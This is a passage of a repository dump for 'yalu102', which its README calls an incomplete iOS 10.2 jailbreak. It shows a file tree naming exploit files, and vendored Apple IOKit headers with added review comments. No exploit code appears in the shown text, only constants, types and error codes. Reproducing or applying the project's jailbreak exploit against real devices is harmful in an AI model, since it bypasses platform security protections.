├── .gitignore ├── Impactor_0.9.38.dmg ├── Impactor_For_Windows.zip ├── README.md ├── SourceCode ├── Headers │ └── IOKit │ │ ├── IOKitKeys.h │ │ ├── IOKitLib.h │ │ ├── IOReturn.h │ │ ├── IOTypes.h │ │ ├── OSMessageNotification.h │ │ └── iokitmig.h ├── yalu102.xcodeproj │ ├── project.pbxproj │ └── project.xcworkspace │ │ └── contents.xcworkspacedata └── yalu102 │ ├── 0.reload.plist │ ├── AppDelegate.h │ ├── AppDelegate.m │ ├── Assets.xcassets │ └── AppIcon.appiconset │ │ ├── AppIcon40x40@2x~ipad-1.png │ │ ├── AppIcon40x40@2x~ipad.png │ │ ├── AppIcon40x40@2x~ipadnotif.png │ │ ├── AppIcon40x40@2x~ipadsptl-1.png │ │ ├── AppIcon40x40@2x~ipadsptl.png │ │ ├── AppIcon40x40@2x~ipadsptl3.png │ │ ├── AppIcon40x40@2x~ipadsptlsmal.png │ │ ├── AppIcon40x40@3x~iphone.png │ │ ├── AppIcon40x40~ipad-1.png │ │ ├── AppIcon40x40~ipad-2.png │ │ ├── AppIcon40x40~ipad.png │ │ ├── AppIcon60x60.png │ │ ├── AppIcon60x60@2x.png │ │ ├── AppIcon60x60@2x~ipad.png │ │ ├── AppIcon60x60@2x~ipadpro.png │ │ ├── AppIcon60x60@3x.png │ │ ├── AppIcon60x60~ipad.png │ │ └── Contents.json │ ├── Base.lproj │ ├── LaunchScreen.storyboard │ └── Main.storyboard │ ├── IOKit.tbd │ ├── Info.plist │ ├── ViewController.h │ ├── ViewController.m │ ├── bootstrap.tar │ ├── devicesupport.h │ ├── devicesupport.m │ ├── iokitmig64.o │ ├── jailbreak.m │ ├── launchctl │ ├── main.m │ ├── offsets.c │ ├── offsets.h │ ├── patchfinder64.h │ ├── patchfinder64.o │ ├── pte_stuff.h │ ├── reload │ └── tar ├── yalu102.app ├── 0.reload.plist ├── AppIcon20x20@2x.png ├── AppIcon20x20@2x~ipad.png ├── AppIcon20x20@3x.png ├── AppIcon20x20~ipad.png ├── AppIcon29x29@2x.png ├── AppIcon29x29@2x~ipad.png ├── AppIcon29x29@3x.png ├── AppIcon29x29~ipad.png ├── AppIcon40x40@2x.png ├── AppIcon40x40@2x~ipad.png ├── AppIcon40x40@3x.png ├── AppIcon40x40~ipad.png ├── AppIcon60x60@2x.png ├── AppIcon60x60@3x.png ├── AppIcon76x76@2x~ipad.png ├── AppIcon76x76~ipad.png ├── AppIcon83.5x83.5@2x~ipad.png ├── Base.lproj │ ├── LaunchScreen.storyboardc │ │ ├── 
01J-lp-oVM-view-Ze5-6b-2t3.nib │ │ ├── Info.plist │ │ └── UIViewController-01J-lp-oVM.nib │ └── Main.storyboardc │ │ ├── BYZ-38-t0r-view-8bC-Xf-vdC.nib │ │ ├── Info.plist │ │ └── UIViewController-BYZ-38-t0r.nib ├── Info.plist ├── PkgInfo ├── _CodeSignature │ └── CodeResources ├── bootstrap.tar ├── embedded.mobileprovision ├── launchctl ├── reload ├── tar └── yalu102 └── yalu102.ipa /.gitignore: -------------------------------------------------------------------------------- 1 | # Xcode 2 | # 3 | # gitignore contributors: remember to update Global/Xcode.gitignore, Objective-C.gitignore & Swift.gitignore 4 | 5 | ## Build generated 6 | build/ 7 | DerivedData/ 8 | 9 | ## Various settings 10 | *.pbxuser 11 | !default.pbxuser 12 | *.mode1v3 13 | !default.mode1v3 14 | *.mode2v3 15 | !default.mode2v3 16 | *.perspectivev3 17 | !default.perspectivev3 18 | xcuserdata/ 19 | 20 | ## Other 21 | *.moved-aside 22 | *.xccheckout 23 | *.xcscmblueprint 24 | 25 | 26 | .DS_Store 27 | 28 | -------------------------------------------------------------------------------- /Impactor_0.9.38.dmg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/Impactor_0.9.38.dmg -------------------------------------------------------------------------------- /Impactor_For_Windows.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/Impactor_For_Windows.zip -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # yalu102 2 | 3 | incomplete iOS 10.2 jailbreak for 64 bit devices by qwertyoruiopz and marcograssi 4 | 5 | add header support and ipa file by @SparkZheng 6 | 7 | 8 | 
-------------------------------------------------------------------------------- /SourceCode/Headers/IOKit/IOKitKeys.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 1998-2000 Apple Computer, Inc. All rights reserved. 3 | * 4 | * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ 5 | * 6 | * This file contains Original Code and/or Modifications of Original Code 7 | * as defined in and that are subject to the Apple Public Source License 8 | * Version 2.0 (the 'License'). You may not use this file except in 9 | * compliance with the License. The rights granted to you under the License 10 | * may not be used to create, or enable the creation or redistribution of, 11 | * unlawful or unlicensed copies of an Apple operating system, or to 12 | * circumvent, violate, or enable the circumvention or violation of, any 13 | * terms of an Apple operating system software license agreement. 14 | * 15 | * Please obtain a copy of the License at 16 | * http://www.opensource.apple.com/apsl/ and read it before using this file. 17 | * 18 | * The Original Code and all software distributed under the License are 19 | * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER 20 | * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, 21 | * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, 22 | * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. 23 | * Please see the License for the specific language governing rights and 24 | * limitations under the License. 25 | * 26 | * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ 27 | */ 28 | /* 29 | * Copyright (c) 1999 Apple Computer, Inc. All rights reserved. 30 | * 31 | * Common symbol definitions for IOKit. 
*
 * HISTORY
 *
 */

/*
 * Review notes:
 * Every macro in this header expands to a C string literal naming an IOKit
 * registry plane, class, property key or notification type; the header
 * declares no functions or types.
 * This is a vendored copy carried under SourceCode/Headers/IOKit, so it is
 * left unchanged here and only annotated.
 */

#ifndef _IOKIT_IOKITKEYS_H
#define _IOKIT_IOKITKEYS_H

// properties found in the registry root
#define kIOKitBuildVersionKey "IOKitBuildVersion"
#define kIOKitDiagnosticsKey "IOKitDiagnostics"
// a dictionary keyed by plane name
#define kIORegistryPlanesKey "IORegistryPlanes"
#define kIOCatalogueKey "IOCatalogue"

// registry plane names
#define kIOServicePlane "IOService"
#define kIOPowerPlane "IOPower"
#define kIODeviceTreePlane "IODeviceTree"
#define kIOAudioPlane "IOAudio"
#define kIOFireWirePlane "IOFireWire"
#define kIOUSBPlane "IOUSB"

// registry ID number
#define kIORegistryEntryIDKey "IORegistryEntryID"

// IOService class name
// (same literal as kIOServicePlane above; the two macros are kept separate by name)
#define kIOServiceClass "IOService"

// IOResources class name
#define kIOResourcesClass "IOResources"

// IOService driver probing property names
#define kIOClassKey "IOClass"
#define kIOProbeScoreKey "IOProbeScore"
#define kIOKitDebugKey "IOKitDebug"

// IOService matching property names
#define kIOProviderClassKey "IOProviderClass"
#define kIONameMatchKey "IONameMatch"
#define kIOPropertyMatchKey "IOPropertyMatch"
#define kIOPathMatchKey "IOPathMatch"
#define kIOLocationMatchKey "IOLocationMatch"
#define kIOParentMatchKey "IOParentMatch"
#define kIOResourceMatchKey "IOResourceMatch"
// the literal ends in "Match" although the macro name ends in "Key"; use the macro, not a retyped string
#define kIOMatchedServiceCountKey "IOMatchedServiceCountMatch"

#define kIONameMatchedKey "IONameMatched"

#define kIOMatchCategoryKey "IOMatchCategory"
#define kIODefaultMatchCategoryKey "IODefaultMatchCategory"

// IOService default user client class, for loadable user clients
#define kIOUserClientClassKey "IOUserClientClass"

// key to find IOMappers
#define kIOMapperIDKey "IOMapperID"

#define kIOUserClientCrossEndianKey "IOUserClientCrossEndian"
#define kIOUserClientCrossEndianCompatibleKey "IOUserClientCrossEndianCompatible"
#define kIOUserClientSharedInstanceKey "IOUserClientSharedInstance"
// diagnostic string describing the creating task
#define kIOUserClientCreatorKey "IOUserClientCreator"

// IOService notification types
#define kIOPublishNotification "IOServicePublish"
#define kIOFirstPublishNotification "IOServiceFirstPublish"
#define kIOMatchedNotification "IOServiceMatched"
#define kIOFirstMatchNotification "IOServiceFirstMatch"
#define kIOTerminatedNotification "IOServiceTerminate"

// IOService interest notification types
#define kIOGeneralInterest "IOGeneralInterest"
#define kIOBusyInterest "IOBusyInterest"
#define kIOAppPowerStateInterest "IOAppPowerStateInterest"
#define kIOPriorityPowerStateInterest "IOPriorityPowerStateInterest"

#define kIOPlatformDeviceMessageKey "IOPlatformDeviceMessage"

// IOService interest notification types
// NOTE(review): this heading repeats the one above verbatim; the macro name
// suggests a CFPlugIn property key rather than an interest type - confirm
// against the upstream header.
#define kIOCFPlugInTypesKey "IOCFPlugInTypes"

// properties found in services that implement command pooling
#define kIOCommandPoolSizeKey "IOCommandPoolSize" // (OSNumber)

// properties found in services that implement priority
#define kIOMaximumPriorityCountKey "IOMaximumPriorityCount" // (OSNumber)

// properties found in services that have transfer constraints
#define kIOMaximumBlockCountReadKey "IOMaximumBlockCountRead" // (OSNumber)
#define kIOMaximumBlockCountWriteKey "IOMaximumBlockCountWrite" // (OSNumber)
#define kIOMaximumByteCountReadKey "IOMaximumByteCountRead" // (OSNumber)
#define kIOMaximumByteCountWriteKey "IOMaximumByteCountWrite" // (OSNumber)
#define kIOMaximumSegmentCountReadKey "IOMaximumSegmentCountRead" // (OSNumber)
#define kIOMaximumSegmentCountWriteKey "IOMaximumSegmentCountWrite" // (OSNumber)
#define kIOMaximumSegmentByteCountReadKey "IOMaximumSegmentByteCountRead" // (OSNumber)
#define kIOMaximumSegmentByteCountWriteKey "IOMaximumSegmentByteCountWrite" // (OSNumber)
#define kIOMinimumSegmentAlignmentByteCountKey "IOMinimumSegmentAlignmentByteCount" // (OSNumber)
#define kIOMaximumSegmentAddressableBitCountKey "IOMaximumSegmentAddressableBitCount" // (OSNumber)

// properties found in services that wish to describe an icon
//
// IOIcon =
// {
//     CFBundleIdentifier = "com.example.driver.example";
//     IOBundleResourceFile = "example.icns";
// };
//
// where IOBundleResourceFile is the filename of the resource

#define kIOIconKey "IOIcon" // (OSDictionary)
#define kIOBundleResourceFileKey "IOBundleResourceFile" // (OSString)

#define kIOBusBadgeKey "IOBusBadge" // (OSDictionary)
#define kIODeviceIconKey "IODeviceIcon" // (OSDictionary)

// property of root that describes the machine's serial number as a string
// (a device identifier: keep values read through this key out of logs and crash reports)
#define kIOPlatformSerialNumberKey "IOPlatformSerialNumber" // (OSString)

// property of root that describes the machine's UUID as a string
// (a device identifier: handle with the same care as the serial number)
#define kIOPlatformUUIDKey "IOPlatformUUID" // (OSString)

// IODTNVRAM property keys
#define kIONVRAMDeletePropertyKey "IONVRAM-DELETE-PROPERTY"
#define kIONVRAMSyncNowPropertyKey "IONVRAM-SYNCNOW-PROPERTY"
#define kIONVRAMActivateCSRConfigPropertyKey "IONVRAM-ARMCSR-PROPERTY"
#define kIODTNVRAMPanicInfoKey "aapl,panic-info"

// keys for complex boot information
#define kIOBootDeviceKey "IOBootDevice" // dict | array of dicts
#define kIOBootDevicePathKey "IOBootDevicePath" // arch-neutral OSString
#define kIOBootDeviceSizeKey "IOBootDeviceSize" // OSNumber of bytes

// keys for OS Version information
#define kOSBuildVersionKey "OS Build Version"

#endif /* !
_IOKIT_IOKITKEYS_H */ 170 | -------------------------------------------------------------------------------- /SourceCode/Headers/IOKit/IOReturn.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 1998-2002 Apple Computer, Inc. All rights reserved. 3 | * 4 | * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ 5 | * 6 | * This file contains Original Code and/or Modifications of Original Code 7 | * as defined in and that are subject to the Apple Public Source License 8 | * Version 2.0 (the 'License'). You may not use this file except in 9 | * compliance with the License. The rights granted to you under the License 10 | * may not be used to create, or enable the creation or redistribution of, 11 | * unlawful or unlicensed copies of an Apple operating system, or to 12 | * circumvent, violate, or enable the circumvention or violation of, any 13 | * terms of an Apple operating system software license agreement. 14 | * 15 | * Please obtain a copy of the License at 16 | * http://www.opensource.apple.com/apsl/ and read it before using this file. 17 | * 18 | * The Original Code and all software distributed under the License are 19 | * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER 20 | * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, 21 | * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, 22 | * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. 23 | * Please see the License for the specific language governing rights and 24 | * limitations under the License. 25 | * 26 | * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ 27 | */ 28 | /* 29 | * HISTORY 30 | */ 31 | 32 | /* 33 | * Core IOReturn values. Others may be family defined. 
*/

/*
 * Review notes:
 * IOReturn is a typedef of kern_return_t. Every non-success code below is
 * built by OR-ing three parts: the IOKit system selector (sys_iokit), a
 * subsystem selector (sub_iokit_*) and a small code number.
 * err_system(), err_sub(), kern_return_t and KERN_SUCCESS are not defined in
 * this file; they presumably come from the include below.
 * This is a vendored copy, so the definitions are left unchanged and only
 * annotated.
 */

#ifndef __IOKIT_IORETURN_H
#define __IOKIT_IORETURN_H

#ifdef __cplusplus
extern "C" {
#endif

/*
 * NOTE(review): the include target is missing on this page, most likely
 * because angle-bracket text was stripped during extraction. Upstream
 * IOReturn.h includes <mach/error.h> at this point - confirm against the
 * repository copy before compiling.
 */
#include

typedef kern_return_t IOReturn;

/* System selector for IOKit; the #ifndef lets an earlier definition win. */
#ifndef sys_iokit
#define sys_iokit err_system(0x38)
#endif /* sys_iokit */

/* Subsystem selectors, one per driver family. The numbering has gaps. */
#define sub_iokit_common err_sub(0)
#define sub_iokit_usb err_sub(1)
#define sub_iokit_firewire err_sub(2)
#define sub_iokit_block_storage err_sub(4)
#define sub_iokit_graphics err_sub(5)
#define sub_iokit_networking err_sub(6)
#define sub_iokit_bluetooth err_sub(8)
#define sub_iokit_pmu err_sub(9)
#define sub_iokit_acpi err_sub(10)
#define sub_iokit_smbus err_sub(11)
#define sub_iokit_ahci err_sub(12)
#define sub_iokit_powermanagement err_sub(13)
#define sub_iokit_hidsystem err_sub(14)
#define sub_iokit_scsi err_sub(16)
#define sub_iokit_usbaudio err_sub(17)
//#define sub_iokit_pccard err_sub(21)
#define sub_iokit_thunderbolt err_sub(29)
#define sub_iokit_platform err_sub(0x2A)
#define sub_iokit_audio_video err_sub(0x45)
#define sub_iokit_baseband err_sub(0x80)
#define sub_iokit_HDA err_sub(254)
#define sub_iokit_hsic err_sub(0x147)
#define sub_iokit_sdio err_sub(0x174)
#define sub_iokit_wlan err_sub(0x208)

#define sub_iokit_vendor_specific err_sub(-2)
#define sub_iokit_reserved err_sub(-1)

/*
 * Code constructors. The arguments are substituted without parentheses, so an
 * argument containing an operator that binds more loosely than `|` (for
 * example `?:` or `||`) would be regrouped by the expansion. Every use in this
 * file passes a plain hex constant; callers should do the same.
 */
#define iokit_common_err(return) (sys_iokit|sub_iokit_common|return)
#define iokit_family_err(sub,return) (sys_iokit|sub|return)
#define iokit_vendor_specific_err(return) (sys_iokit|sub_iokit_vendor_specific|return)

/*
 * Common codes. Only kIOReturnSuccess means success, so callers should compare
 * against it rather than test for a particular failure.
 * kIOReturnNotPrivileged (0x2c1) and kIOReturnNotPermitted (0x2e2) are
 * distinct values; code that logs or alerts on access denials needs to match
 * both.
 */
#define kIOReturnSuccess KERN_SUCCESS // OK
#define kIOReturnError iokit_common_err(0x2bc) // general error
#define kIOReturnNoMemory iokit_common_err(0x2bd) // can't allocate memory
#define kIOReturnNoResources iokit_common_err(0x2be) // resource shortage
#define kIOReturnIPCError iokit_common_err(0x2bf) // error during IPC
#define kIOReturnNoDevice iokit_common_err(0x2c0) // no such device
#define kIOReturnNotPrivileged iokit_common_err(0x2c1) // privilege violation
#define kIOReturnBadArgument iokit_common_err(0x2c2) // invalid argument
#define kIOReturnLockedRead iokit_common_err(0x2c3) // device read locked
#define kIOReturnLockedWrite iokit_common_err(0x2c4) // device write locked
#define kIOReturnExclusiveAccess iokit_common_err(0x2c5) // exclusive access and device already open
#define kIOReturnBadMessageID iokit_common_err(0x2c6) // sent/received messages had different msg_id
#define kIOReturnUnsupported iokit_common_err(0x2c7) // unsupported function
#define kIOReturnVMError iokit_common_err(0x2c8) // misc. VM failure
#define kIOReturnInternalError iokit_common_err(0x2c9) // internal error
#define kIOReturnIOError iokit_common_err(0x2ca) // General I/O error
//#define kIOReturn???Error iokit_common_err(0x2cb) // ???
#define kIOReturnCannotLock iokit_common_err(0x2cc) // can't acquire lock
#define kIOReturnNotOpen iokit_common_err(0x2cd) // device not open
#define kIOReturnNotReadable iokit_common_err(0x2ce) // read not supported
#define kIOReturnNotWritable iokit_common_err(0x2cf) // write not supported
#define kIOReturnNotAligned iokit_common_err(0x2d0) // alignment error
#define kIOReturnBadMedia iokit_common_err(0x2d1) // Media Error
#define kIOReturnStillOpen iokit_common_err(0x2d2) // device(s) still open
#define kIOReturnRLDError iokit_common_err(0x2d3) // rld failure
#define kIOReturnDMAError iokit_common_err(0x2d4) // DMA failure
#define kIOReturnBusy iokit_common_err(0x2d5) // Device Busy
#define kIOReturnTimeout iokit_common_err(0x2d6) // I/O Timeout
#define kIOReturnOffline iokit_common_err(0x2d7) // device offline
#define kIOReturnNotReady iokit_common_err(0x2d8) // not ready
#define kIOReturnNotAttached iokit_common_err(0x2d9) // device not attached
#define kIOReturnNoChannels iokit_common_err(0x2da) // no DMA channels left
#define kIOReturnNoSpace iokit_common_err(0x2db) // no space for data
//#define kIOReturn???Error iokit_common_err(0x2dc) // ???
#define kIOReturnPortExists iokit_common_err(0x2dd) // port already exists
#define kIOReturnCannotWire iokit_common_err(0x2de) // can't wire down physical memory
#define kIOReturnNoInterrupt iokit_common_err(0x2df) // no interrupt attached
#define kIOReturnNoFrames iokit_common_err(0x2e0) // no DMA frames enqueued
#define kIOReturnMessageTooLarge iokit_common_err(0x2e1) // oversized msg received on interrupt port
#define kIOReturnNotPermitted iokit_common_err(0x2e2) // not permitted
#define kIOReturnNoPower iokit_common_err(0x2e3) // no power to device
#define kIOReturnNoMedia iokit_common_err(0x2e4) // media not present
#define kIOReturnUnformattedMedia iokit_common_err(0x2e5)// media not formatted
#define kIOReturnUnsupportedMode iokit_common_err(0x2e6) // no such mode
#define kIOReturnUnderrun iokit_common_err(0x2e7) // data underrun
#define kIOReturnOverrun iokit_common_err(0x2e8) // data overrun
#define kIOReturnDeviceError iokit_common_err(0x2e9) // the device is not working properly!
#define kIOReturnNoCompletion iokit_common_err(0x2ea) // a completion routine is required
#define kIOReturnAborted iokit_common_err(0x2eb) // operation aborted
#define kIOReturnNoBandwidth iokit_common_err(0x2ec) // bus bandwidth would be exceeded
#define kIOReturnNotResponding iokit_common_err(0x2ed) // device not responding
#define kIOReturnIsoTooOld iokit_common_err(0x2ee) // isochronous I/O request for distant past!
#define kIOReturnIsoTooNew iokit_common_err(0x2ef) // isochronous I/O request for distant future
#define kIOReturnNotFound iokit_common_err(0x2f0) // data was not found
#define kIOReturnInvalid iokit_common_err(0x1) // should never be seen

#ifdef __cplusplus
}
#endif

#endif /* !
__IOKIT_IORETURN_H */ 147 | -------------------------------------------------------------------------------- /SourceCode/Headers/IOKit/IOTypes.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 1998-2012 Apple Computer, Inc. All rights reserved. 3 | * 4 | * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ 5 | * 6 | * This file contains Original Code and/or Modifications of Original Code 7 | * as defined in and that are subject to the Apple Public Source License 8 | * Version 2.0 (the 'License'). You may not use this file except in 9 | * compliance with the License. The rights granted to you under the License 10 | * may not be used to create, or enable the creation or redistribution of, 11 | * unlawful or unlicensed copies of an Apple operating system, or to 12 | * circumvent, violate, or enable the circumvention or violation of, any 13 | * terms of an Apple operating system software license agreement. 14 | * 15 | * Please obtain a copy of the License at 16 | * http://www.opensource.apple.com/apsl/ and read it before using this file. 17 | * 18 | * The Original Code and all software distributed under the License are 19 | * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER 20 | * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, 21 | * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, 22 | * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. 23 | * Please see the License for the specific language governing rights and 24 | * limitations under the License. 
*
 * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
 */

/*
 * Review notes:
 * This header declares the basic scalar, address and range types used with
 * IOKit, plus the user-space port typedefs and the memory-mapping option
 * enums. It contains no functions.
 * The widths of several types depend on the target architecture; see the
 * #if blocks below.
 * NOTE(review): the targets of the bare #include lines are missing on this
 * page, most likely because angle-bracket text was stripped during
 * extraction. UInt32, SInt32, UInt64 and the mach_* and vm_* types are not
 * defined in the visible text and presumably come from those includes;
 * restore them from the repository copy before compiling.
 */
#ifndef __IOKIT_IOTYPES_H
#define __IOKIT_IOTYPES_H

#ifndef IOKIT
#define IOKIT 1
#endif /* !IOKIT */

#include
#include

#include "IOKit/IOReturn.h"

#ifdef __cplusplus
extern "C" {
#endif

#ifndef NULL
#if defined (__cplusplus)
#define NULL 0
#else
#define NULL ((void *)0)
#endif
#endif

/*
 * Simple data types.
 */
#include
//#include


typedef UInt32 IOOptionBits;
typedef SInt32 IOFixed;
typedef UInt32 IOVersion;
typedef UInt32 IOItemCount;
typedef UInt32 IOCacheMode;

typedef UInt32 IOByteCount32;
typedef UInt64 IOByteCount64;

typedef UInt32 IOPhysicalAddress32;
typedef UInt64 IOPhysicalAddress64;
typedef UInt32 IOPhysicalLength32;
typedef UInt64 IOPhysicalLength64;

/* Virtual addresses use the mach_vm type unless the target defines __arm__ or __i386__. */
#if !defined(__arm__) && !defined(__i386__)
typedef mach_vm_address_t IOVirtualAddress;
#else
typedef vm_address_t IOVirtualAddress;
#endif

/*
 * IOByteCount is 64 bits wide or 32 bits wide depending on the target, so a
 * length that fits on one build can truncate on another. Code that stores a
 * byte count in a fixed-width field should check the range first.
 */
#if !defined(__arm__) && !defined(__i386__) && !(defined(__x86_64__) && !defined(KERNEL))
typedef IOByteCount64 IOByteCount;
#else
typedef IOByteCount32 IOByteCount;
#endif

typedef IOVirtualAddress IOLogicalAddress;

#if !defined(__arm__) && !defined(__i386__) && !(defined(__x86_64__) && !defined(KERNEL))

typedef IOPhysicalAddress64 IOPhysicalAddress;
typedef IOPhysicalLength64 IOPhysicalLength;
/*
 * Combines two 32-bit halves into a 64-bit value. `hi` is parenthesized but
 * `lo` is not, so the cast applies only to the first operand of a compound
 * `lo` argument. A negative signed `lo` is also sign-extended by the cast.
 * Pass a single unsigned 32-bit value for `lo`.
 */
#define IOPhysical32( hi, lo ) ((UInt64) lo + ((UInt64)(hi) << 32))
#define IOPhysSize 64

#else

typedef IOPhysicalAddress32 IOPhysicalAddress;
typedef IOPhysicalLength32 IOPhysicalLength;
/* 32-bit variant: `hi` is discarded and never evaluated. */
#define IOPhysical32( hi, lo ) (lo)
#define IOPhysSize 32

#endif


/*
 * Address and length pairs. Nothing in these types enforces that
 * address + length stays within the address space; code that takes a range
 * from a less-trusted source should check for wrap-around before using it.
 */
typedef struct
{
    IOPhysicalAddress address;
    IOByteCount length;
} IOPhysicalRange;

typedef struct
{
    IOVirtualAddress address;
    IOByteCount length;
} IOVirtualRange;

#if !defined(__arm__) && !defined(__i386__)
typedef IOVirtualRange IOAddressRange;
#else
typedef struct
{
    mach_vm_address_t address;
    mach_vm_size_t length;
} IOAddressRange;
#endif

/*
 * Map between #defined or enum'd constants and text description.
 */
typedef struct {
    int value;
    const char *name;
} IONamedValue;


/*
 * Memory alignment -- specified as a power of two.
 */
typedef unsigned int IOAlignment;

#define IO_NULL_VM_TASK ((vm_task_t)0)


/*
 * Pull in machine specific stuff.
 */

//#include

#ifndef MACH_KERNEL

/* Outside MACH_KERNEL builds, every io_*_t handle below is a typedef of mach_port_t. */
#ifndef __IOKIT_PORTS_DEFINED__
#define __IOKIT_PORTS_DEFINED__
typedef mach_port_t io_object_t;
#endif /* __IOKIT_PORTS_DEFINED__ */

#include

/*
 * These are aliases of one type, so the compiler will not flag a handle of
 * one kind being passed where another kind is expected.
 */
typedef io_object_t io_connect_t;
typedef io_object_t io_enumerator_t;
typedef io_object_t io_iterator_t;
typedef io_object_t io_registry_entry_t;
typedef io_object_t io_service_t;

#define IO_OBJECT_NULL ((io_object_t) 0)

#endif /* MACH_KERNEL */

// IOConnectMapMemory memoryTypes
enum {
    kIODefaultMemoryType = 0
};

/* Cache-mode selectors; the kIOMap*Cache options below are these values shifted left by kIOMapCacheShift. */
enum {
    kIODefaultCache = 0,
    kIOInhibitCache = 1,
    kIOWriteThruCache = 2,
    kIOCopybackCache = 3,
    kIOWriteCombineCache = 4,
    kIOCopybackInnerCache = 5
};

// IOMemory mapping options
enum {
    kIOMapAnywhere = 0x00000001,

    /* kIOMapCacheMask covers bits 8 to 10, which holds cache modes 0 to 5 after the shift. */
    kIOMapCacheMask = 0x00000700,
    kIOMapCacheShift = 8,
    kIOMapDefaultCache = kIODefaultCache << kIOMapCacheShift,
    kIOMapInhibitCache = kIOInhibitCache << kIOMapCacheShift,
    kIOMapWriteThruCache = kIOWriteThruCache <<
kIOMapCacheShift, 191 | kIOMapCopybackCache = kIOCopybackCache << kIOMapCacheShift, 192 | kIOMapWriteCombineCache = kIOWriteCombineCache << kIOMapCacheShift, 193 | kIOMapCopybackInnerCache = kIOCopybackInnerCache << kIOMapCacheShift, 194 | 195 | kIOMapUserOptionsMask = 0x00000fff, 196 | 197 | kIOMapReadOnly = 0x00001000, 198 | 199 | kIOMapStatic = 0x01000000, 200 | kIOMapReference = 0x02000000, 201 | kIOMapUnique = 0x04000000, 202 | kIOMapPrefault = 0x10000000, 203 | kIOMapOverwrite = 0x20000000 204 | }; 205 | 206 | /*! @enum Scale Factors 207 | @discussion Used when a scale_factor parameter is required to define a unit of time. 208 | @constant kNanosecondScale Scale factor for nanosecond based times. 209 | @constant kMicrosecondScale Scale factor for microsecond based times. 210 | @constant kMillisecondScale Scale factor for millisecond based times. 211 | @constant kTickScale Scale factor for the standard (100Hz) tick. 212 | @constant kSecondScale Scale factor for second based times. */ 213 | 214 | enum { 215 | kNanosecondScale = 1, 216 | kMicrosecondScale = 1000, 217 | kMillisecondScale = 1000 * 1000, 218 | kSecondScale = 1000 * 1000 * 1000, 219 | kTickScale = (kSecondScale / 100) 220 | }; 221 | 222 | enum { 223 | kIOConnectMethodVarOutputSize = -3 224 | }; 225 | 226 | /* compatibility types */ 227 | 228 | 229 | typedef unsigned int IODeviceNumber; 230 | 231 | 232 | #ifdef __cplusplus 233 | } 234 | #endif 235 | 236 | #endif /* ! __IOKIT_IOTYPES_H */ 237 | -------------------------------------------------------------------------------- /SourceCode/Headers/IOKit/OSMessageNotification.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 1998-2000 Apple Computer, Inc. All rights reserved. 
3 | * 4 | * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ 5 | * 6 | * This file contains Original Code and/or Modifications of Original Code 7 | * as defined in and that are subject to the Apple Public Source License 8 | * Version 2.0 (the 'License'). You may not use this file except in 9 | * compliance with the License. The rights granted to you under the License 10 | * may not be used to create, or enable the creation or redistribution of, 11 | * unlawful or unlicensed copies of an Apple operating system, or to 12 | * circumvent, violate, or enable the circumvention or violation of, any 13 | * terms of an Apple operating system software license agreement. 14 | * 15 | * Please obtain a copy of the License at 16 | * http://www.opensource.apple.com/apsl/ and read it before using this file. 17 | * 18 | * The Original Code and all software distributed under the License are 19 | * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER 20 | * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, 21 | * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, 22 | * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. 23 | * Please see the License for the specific language governing rights and 24 | * limitations under the License. 25 | * 26 | * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ 27 | */ 28 | /* 29 | * Copyright (c) 1999 Apple Computer, Inc. All rights reserved. 
*
 * HISTORY
 *
 */

/*
 * Review notes:
 * This header declares the notification type numbers, message IDs,
 * async-reference index constants and message-header layouts for IOKit
 * notifications. It contains no functions.
 * NOTE(review): the targets of the two bare #include lines are missing on
 * this page, most likely because angle-bracket text was stripped during
 * extraction. mach_msg_size_t, natural_t and io_user_reference_t are not
 * defined in the visible text and presumably come from those includes.
 */

#ifndef __OS_OSMESSAGENOTIFICATION_H
#define __OS_OSMESSAGENOTIFICATION_H

#ifdef __cplusplus
extern "C" {
#endif

#include
#include
#include "IOKit/IOReturn.h"

/*
 * Notification type numbers. kFirstIOKitNotificationType and
 * kIOServicePublishNotificationType share the value 100; the range runs to
 * kLastIOKitNotificationType (199).
 */
enum {
    kFirstIOKitNotificationType = 100,
    kIOServicePublishNotificationType = 100,
    kIOServiceMatchedNotificationType = 101,
    kIOServiceTerminatedNotificationType = 102,
    kIOAsyncCompletionNotificationType = 150,
    kIOServiceMessageNotificationType = 160,
    kLastIOKitNotificationType = 199,

    // reserved bits
    // ("Notication" is the spelling used on this page; code must use the names as written)
